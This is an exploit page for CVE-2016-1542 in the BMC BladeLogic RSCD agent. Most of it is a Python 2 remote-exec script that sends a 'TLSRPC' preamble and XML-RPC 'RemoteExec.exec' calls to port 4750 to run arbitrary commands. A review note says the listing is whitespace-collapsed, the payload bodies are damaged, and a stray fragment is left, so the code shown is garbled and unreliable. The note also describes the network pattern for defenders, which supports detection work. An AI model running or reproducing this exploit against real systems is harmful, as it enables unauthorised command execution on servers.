# CVE-2016-1542 BMC BladeLogic 8.3.00.64 遠程命令執行漏洞
==EXP==
# NOTE(review): this listing was whitespace-collapsed by the page extraction. The whole
# original file (header comments, imports, the three connection/adapter classes,
# optParser, sendXMLRPC and the module-level script) is fused onto the two lines
# below, so it is not runnable as shown; the first line is swallowed by its own
# leading `#` and the second begins mid-expression.
# Observations grounded in the visible text:
#  - It is Python 2 code (`print r.status_code`, `import httplib`,
#    `requests.packages.urllib3` imports).
#  - The multi-line XML-RPC bodies are damaged by the extraction: `intro` appears as an
#    empty string, and the `rexec` payload is split, with a stray
#    `RemoteExec.exec """ + rexec + """` fragment left after `wrappedSocket.close()`.
#    Nothing here should be treated as the original request bodies.
#  - `MyHTTPConnection.connect` assigns the module-level `wrappedSocket` to `self.sock`,
#    and both `__init__` methods pass the module-level `HOST` to their base class; those
#    names are only bound after argument parsing at the top level, so the classes work
#    solely because of the script's execution order (late name resolution).
#  - `ssl.wrap_socket(sock)` is called without any certificate or hostname verification.
# Defender's view: the observable pattern is a TCP connection to the RSCD agent port
# (default 4750) that sends the literal `TLSRPC` preamble, then performs a TLS
# handshake, then issues an HTTP POST to `/xmlrpc` carrying the `RemoteServer.intro`
# and `RemoteExec.exec` method names; the vendor advisory linked in the header is the
# authoritative reference for affected versions and the fix.
# Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version # Filename: BMC_rexec.py # Github: https://github.com/bao7uo/bmc_bladelogic # Date: 2018-01-24 # Exploit Author: Paul Taylor / Foregenix Ltd # Website: http://www.foregenix.com/blog # Version: BMC RSCD agent 8.3.00.64 # CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011) # Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-critical-security-issue-in-bmc-server-automation-cve-2016-1542-cve-2016-1543 # Tested on: 8.3.00.64 #!/usr/bin/python # BMC BladeLogic RSCD agent remote exec - XMLRPC version # CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011) # By Paul Taylor / Foregenix Ltd # Credit: https://github.com/ernw/insinuator-snippets/tree/master/bmc_bladelogic # Credit: https://github.com/yaolga # Credit: Nick Bloor for AWS image for testing :-) # https://github.com/NickstaDB/PoC/tree/master/BMC_RSCD_RCE import socket import ssl import sys import argparse import requests import httplib from requests.packages.urllib3 import PoolManager from requests.packages.urllib3.connection import HTTPConnection from requests.packages.urllib3.connectionpool import HTTPConnectionPool from requests.adapters import HTTPAdapter class MyHTTPConnection(HTTPConnection): def __init__(self, unix_socket_url, timeout=60): HTTPConnection.__init__(self, HOST, timeout=timeout) self.unix_socket_url = unix_socket_url self.timeout = timeout def connect(self): self.sock = wrappedSocket class MyHTTPConnectionPool(HTTPConnectionPool): def __init__(self, socket_path, timeout=60): HTTPConnectionPool.__init__(self, HOST, timeout=timeout) self.socket_path = socket_path self.timeout = timeout def _new_conn(self): return MyHTTPConnection(self.socket_path, self.timeout) class MyAdapter(HTTPAdapter): def __init__(self, timeout=60): super(MyAdapter, self).__init__() self.timeout = timeout def get_connection(self, socket_path, proxies=None): return 
MyHTTPConnectionPool(socket_path, self.timeout) def request_url(self, request, proxies): return request.path_url def optParser(): parser = argparse.ArgumentParser( description="Remote exec " + "BladeLogic Server Automation RSCD agent" ) parser.add_argument("host", help="IP address of a target system") parser.add_argument( "-p", "--port", type=int, default=4750, help="TCP port (default: 4750)" ) parser.add_argument("command", help="Command to execute") opts = parser.parse_args() return opts def sendXMLRPC(host, port, packet, tlsrequest): r = tlsrequest.post( 'http://' + host + ':' + str(port) + '/xmlrpc', data=packet ) print r.status_code print r.content return intro = """""" options = optParser() rexec = options.command PORT = options.port HOST = options.host rexec = """ RemoteServer.intro 2016-1-14-18-10-30-3920958 7 0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252; 8.6.01.66 """ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((HOST, PORT)) sock.sendall("TLSRPC") wrappedSocket = ssl.wrap_socket(sock) adapter = MyAdapter() s = requests.session() s.mount("http://", adapter) sendXMLRPC(HOST, PORT, intro, s) sendXMLRPC(HOST, PORT, rexec, s) wrappedSocket.close() RemoteExec.exec """ + rexec + """